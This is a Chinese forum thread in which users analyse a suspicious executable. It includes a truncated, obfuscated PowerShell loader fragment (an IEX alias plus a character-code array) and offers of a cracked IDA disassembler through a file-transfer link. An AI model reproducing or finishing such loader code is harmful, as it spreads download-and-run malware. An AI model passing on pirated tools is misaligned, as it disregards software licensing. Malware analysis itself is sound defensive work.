36d9a95858fc9575c3c0c0fa00236a0e703f27c7f9ddb209f87c750ba58ec01e

BE_HC

a27573 发表于 2020-4-7 16:37
VALUE "CompanyName",       "aaaa"
VALUE "ProductName",       "工程1"
VALUE "FileVersion",        ...

看起来很像ascii

1. Powershell sal K ('#'.replace('#','I'),'E','X' -join '');$jnhdfuhuh3u34h534uj4u=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,108,32,77,32,36,84,98,111,110,101,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,112,50,50,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,112,50,50,59,36,116,61,32,78,101,119,45,79,98,106,101,99,116,32,45,

复制代码

猥琐大叔

a27573

BE_HC 发表于 2020-4-7 16:47
看起来很像ascii

感觉你没提取全

IDA里看有字符串拼接操作

BE_HC

a27573 发表于 2020-4-7 16:54
感觉你没提取全

IDA里看有字符串拼接操作

我只截了一些，我扔到intezer看的，实体机没IDA

QVM360

a27573 发表于 2020-4-7 16:37
VALUE "CompanyName",       "aaaa"
VALUE "ProductName",       "工程1"
VALUE "FileVersion",        ...

把反编译的工具给我下行不

QVM360

a27573 发表于 2020-4-7 16:54
感觉你没提取全

IDA里看有字符串拼接操作

确实，分成了3段，Chr1\Chr2\Chr3

a27573

QVM360 发表于 2020-4-7 17:29
把反编译的工具给我下行不

就是IDA
破解版的我还在下（52上的）
我现在用的是免费版（只能反汇编，只支持64位）

QVM360

a27573 发表于 2020-4-7 17:43
就是IDA
破解版的我还在下（52上的）
我现在用的是免费版（只能反汇编，只支持64位）

待会给个分流吧

saga3721

被微点扫到。。

BE_HC

a27573 发表于 2020-4-7 17:43
就是IDA
破解版的我还在下（52上的）
我现在用的是免费版（只能反汇编，只支持64位）

给个中文的，之前在吾爱找的

1. 您有一份文件待查收！即刻点击链接获取文件：https://c-t.work/s/6b6ab572dbda43 或进入 cowtransfer.com 获取，在首页输入取件码：akcp8a（24小时内有效）

复制代码